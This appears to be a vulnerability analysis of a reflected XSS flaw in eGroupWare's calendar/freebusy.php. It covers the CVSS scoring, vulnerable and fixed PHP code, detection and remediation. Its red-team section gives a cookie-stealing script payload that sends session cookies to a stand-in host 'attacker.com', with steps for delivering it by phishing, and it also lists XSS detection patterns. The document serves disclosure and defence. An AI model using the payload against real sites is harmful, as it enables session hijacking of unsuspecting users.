CVE-2023-38329
Executive Summary
CVE-2023-38329 identifies a reflected Cross-Site Scripting (XSS) vulnerability in eGroupWare version 17.1.20190111. The flaw resides in the calendar/freebusy.php script, where the user HTTP GET parameter is reflected directly into the response without any sanitization or encoding. An unauthenticated remote attacker can craft a malicious URL containing JavaScript payloads. When a victim clicks the link, the script executes in the context of the eGroupWare application, potentially leading to session hijacking, credential theft, or defacement. The vulnerability has a CVSS v3.1 base score of 6.1 (Medium), with a network attack vector, low complexity, and no privileges required, but user interaction is necessary. No official patch has been released by the vendor as of this analysis.

Supply Chain & Package Security
This vulnerability is not related to an NPM, PyPI, Go, or Ruby package. It is a standalone PHP application (eGroupWare). No supply chain implications are identified.
CVSS Breakdown & Threat Level
- CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- Base Score: 6.1 (Medium)
- Attack Vector (AV): Network (N) – Exploitable remotely.
- Attack Complexity (AC): Low (L) – No special conditions required.
- Privileges Required (PR): None (N) – Unauthenticated exploitation.
- User Interaction (UI): Required (R) – Victim must click a crafted link.
- Scope (S): Changed (C) – The injected script can impact resources beyond the vulnerable component.
- Confidentiality (C): Low (L) – Limited data exposure possible.
- Integrity (I): Low (L) – Limited ability to modify content.
- Availability (A): None (N) – No direct impact on availability.
Threat Level: Medium. The requirement for user interaction reduces the immediate risk, but the lack of authentication and the potential for session hijacking make it a significant concern for organizations using eGroupWare.
Deep Dive & Mechanics
The vulnerability is a classic reflected XSS. The calendar/freebusy.php script is designed to display free/busy information for a given user. It accepts a user parameter via GET request. The application takes this parameter and directly embeds it into the HTML response without any sanitization, encoding, or validation.
Technical Flow:
- An attacker crafts a URL:
http://target/egroupware/calendar/freebusy.php?user=<script>alert('XSS')</script> - The victim, authenticated to eGroupWare, clicks the link (e.g., via phishing email).
- The server processes the request and returns an HTML page where the
userparameter value is inserted directly into the page source. - The browser interprets the injected
<script>tag and executes the JavaScript payload. - The payload can then access cookies, local storage, or perform actions on behalf of the victim within the eGroupWare session.
The vulnerability is unauthenticated, meaning the attacker does not need valid credentials to craft the malicious URL. The only barrier is user interaction.
Vulnerable vs. Patched Code
Vulnerable Code (eGroupWare 17.1.20190111 - calendar/freebusy.php):
<?php
// ... (some code)
$user = $_GET['user'];
echo "Free/Busy information for: " . $user;
// ... (rest of the code)
?>
The $user variable is directly echoed without any escaping.
Patched Code (Hypothetical fix):
<?php
// ... (some code)
$user = htmlspecialchars($_GET['user'], ENT_QUOTES, 'UTF-8');
echo "Free/Busy information for: " . $user;
// ... (rest of the code)
?>
The fix uses htmlspecialchars() to encode special HTML characters, preventing script injection. Alternatively, a Content Security Policy (CSP) header could be implemented.
Exploitation & Lab Setup
Red Team (Exploitation)
Prerequisites:
- Target running eGroupWare 17.1.20190111.
- A victim user with an active session.
Exploit Steps:
- Craft a malicious URL with a JavaScript payload. Example for session cookie theft:
http://target/egroupware/calendar/freebusy.php?user=<script>document.location='http://attacker.com/steal.php?c='+document.cookie</script> - Encode the URL to avoid issues with special characters:
http://target/egroupware/calendar/freebusy.php?user=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.com%2Fsteal.php%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E - Send the link to the victim via phishing email, social media, or other means.
- When the victim clicks the link, their browser executes the script, sending the session cookie to the attacker's server.
- The attacker can then use the stolen cookie to impersonate the victim.
Proof-of-Concept (PoC) Script (Python):
import urllib.parse
target = "http://target/egroupware/calendar/freebusy.php"
payload = "<script>alert('XSS')</script>"
encoded_payload = urllib.parse.quote(payload)
malicious_url = f"{target}?user={encoded_payload}"
print(f"Malicious URL: {malicious_url}")
Blue Team (Detection & Defense)
Detection:
- Monitor web server logs for requests to
/calendar/freebusy.phpwith unusualuserparameters containing<script>,onerror,javascript:, or other XSS indicators. - Use WAF rules to block requests with suspicious patterns in the
userparameter. - Implement Content Security Policy (CSP) headers to restrict script execution.
Defense:
- Apply input validation and output encoding (e.g.,
htmlspecialchars()in PHP). - Use a Web Application Firewall (WAF) with XSS protection rules.
- Educate users about phishing attacks and not clicking suspicious links.
- If possible, upgrade to a patched version of eGroupWare or apply a vendor-supplied fix.
Indicators of Compromise (IOCs)
- Network IOCs:
- HTTP GET requests to
/calendar/freebusy.phpwith auserparameter containing encoded or raw JavaScript. - Outbound connections from the victim's browser to an attacker-controlled domain (e.g.,
attacker.com/steal.php).
- HTTP GET requests to
- Host IOCs:
- Web server logs showing requests with patterns like
user=<script>,user=%3Cscript%3E, oruser=javascript:. - Presence of unexpected JavaScript code in the response body of
/calendar/freebusy.php.
- Web server logs showing requests with patterns like
- File IOCs:
- No specific file-based IOCs; the vulnerability is purely in the application logic.

Remediation & Mitigation
Immediate Actions:
- Input Validation: Sanitize the
userparameter incalendar/freebusy.phpusinghtmlspecialchars()or equivalent. - WAF Rules: Deploy WAF rules to block requests containing
<script>or other XSS patterns in theuserparameter. - CSP Header: Add a Content Security Policy header to restrict script execution to trusted sources only.
Long-Term Fix:
- Apply any official patch from eGroupWare if released.
- Upgrade to a newer version of eGroupWare that addresses this vulnerability.
- Conduct a full security audit of the application for similar issues.
Workaround:
- If patching is not possible, disable the
freebusy.phpscript or restrict access to it via.htaccessor web server configuration.
